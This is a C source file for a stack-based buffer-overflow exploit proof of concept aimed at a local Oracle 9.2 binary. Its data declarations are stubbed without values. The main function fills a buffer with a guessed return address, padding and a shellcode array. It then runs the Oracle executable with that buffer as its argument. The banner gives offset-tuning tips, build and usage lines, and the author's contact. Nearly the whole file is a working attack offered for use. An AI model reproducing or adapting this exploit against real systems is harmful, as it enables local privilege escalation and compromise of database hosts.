
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 unsigned short DEFAULT ;
 char PADDING ;
 int SMASHIT ;
 char* VERSION ;
 int VULNUBL ;
 unsigned short atol (char*) ;
 int execlp (char*,int ,char*,int *) ;
 int memcpy (char*,int ,int) ;
 int operation_oracle ;
 int printf (char*,...) ;
 unsigned short retrieve_offset () ;
 int strlen (int ) ;

int main(int argc, char *argv[])
{
        char Bucket[SMASHIT];
        unsigned long badd_addr;
        unsigned short delta = 0x00;
        unsigned short i;

        if(argc > 1) {
                delta = atol(argv[0x01]);
        }
        else
        {
                delta = DEFAULT;
        }

        badd_addr = retrieve_offset() - delta;

        printf("\n\n*************************************************************\n"
                        "*************************************************************\n");

        printf("[-] %s\n", VERSION);
        printf("[-] -------------------------------------------------------\n"
                        "[-] An offset value from 1750 - 3500 should work perfectly\n"
                        "[-] if this does not nail it first time.\n"
                        "[-] -------------------------------------------------------\n"
                        "[-] Execute this PoC and attach ltrace with -o to a file so\n"
                        "[-] you can grep for the goodness - c0ntex@hushmail.com\n"
                        "[-] http://twistedminds.mine.nu/files/oracle_ownage.c\n"
                        "[-] -------------------------------------------------------\n"
                        "[-] gcc -Wall -o oracle_owned oracle_owned.c\n"
                        "[-] Usage: %s offset_value\n", argv[0x00]);

        for(i = 0x00; i < SMASHIT; i += 0x04)
                *(long *) &Bucket[i] = badd_addr;

        for(i = 0x00; i < (SMASHIT - strlen(operation_oracle) - 0x50); i++)
                *(Bucket + i) = PADDING;

        memcpy(Bucket + i, operation_oracle, strlen(operation_oracle));

        printf("[-] Using Return address 0x%lx\n", badd_addr);
        printf("[-] Using offset value %d\n", delta);

        printf("*************************************************************\n"
                        "*************************************************************\n\n");

        execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle", VULNUBL, Bucket, ((void*)0));

        return 0x00;
}
